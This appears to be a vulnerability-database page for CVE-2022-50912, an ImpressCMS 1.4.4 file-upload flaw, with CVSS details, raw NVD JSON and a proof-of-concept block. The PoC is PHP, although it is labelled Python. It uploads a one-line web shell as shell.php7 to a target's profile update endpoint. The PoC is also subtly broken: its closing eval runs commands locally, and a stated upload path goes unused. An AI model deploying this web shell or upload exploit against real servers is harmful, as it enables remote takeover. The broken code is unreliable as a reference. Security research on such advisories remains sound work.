Security Vulnerability Report
中文
CVE-2022-50912 CVSS 9.8 CRITICAL

CVE-2022-50912

Published: 2026-01-13 23:15:54
Last Modified: 2026-02-03 19:26:43
Source: [email protected]

Description

ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions .php2.php6.php7.phps.pht to execute arbitrary PHP code on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:impresscms:impresscms:1.4.4:*:*:*:*:*:*:* - VULNERABLE
ImpressCMS < 1.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2022-50912 PoC - ImpressCMS File Upload RCE // Target: ImpressCMS <= 1.4.4 // Exploit: Upload malicious PHP file with .php7 extension $target = 'http://target-website.com'; $upload_path = '/modules/profile/avatar.php7'; // Known upload path // Create malicious PHP file content $payload = '<?php system($_GET["cmd"]); ?>'; // Prepare multipart form data $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8)); $body = '--' . $boundary . "\r\n"; $body .= 'Content-Disposition: form-data; name="avatar_file"; filename="shell.php7"' . "\r\n"; $body .= 'Content-Type: application/octet-stream' . "\r\n\r\n"; $body .= $payload . "\r\n"; $body .= '--' . $boundary . '--' . "\r\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target . '/user.php?op=update'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $body); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary ]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); // Execute command via uploaded shell eval('system($_GET["cmd"]);'); // Usage: ?cmd=whoami ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50912", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:54.350", "lastModified": "2026-02-03T19:26:43.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions .php2.php6.php7.phps.pht to execute arbitrary PHP code on the server."}, {"lang": "es", "value": "ImpressCMS 1.4.4 contiene una vulnerabilidad de carga de archivos con una sanitización débil de la extensión que permite a los atacantes cargar archivos potencialmente maliciosos. Los atacantes pueden eludir las restricciones de carga de archivos utilizando extensiones de archivo alternativas .php2.php6.php7.phps.pht para ejecutar código PHP arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:impresscms:impresscms:1.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "613DF01A-E71B-46E2-AF83-FCB4A46EB17E"}]}]}], "references": [{"url": "https://github.com/ImpressCMS/impresscms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50890", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.impresscms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/impresscms-unrestricted-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.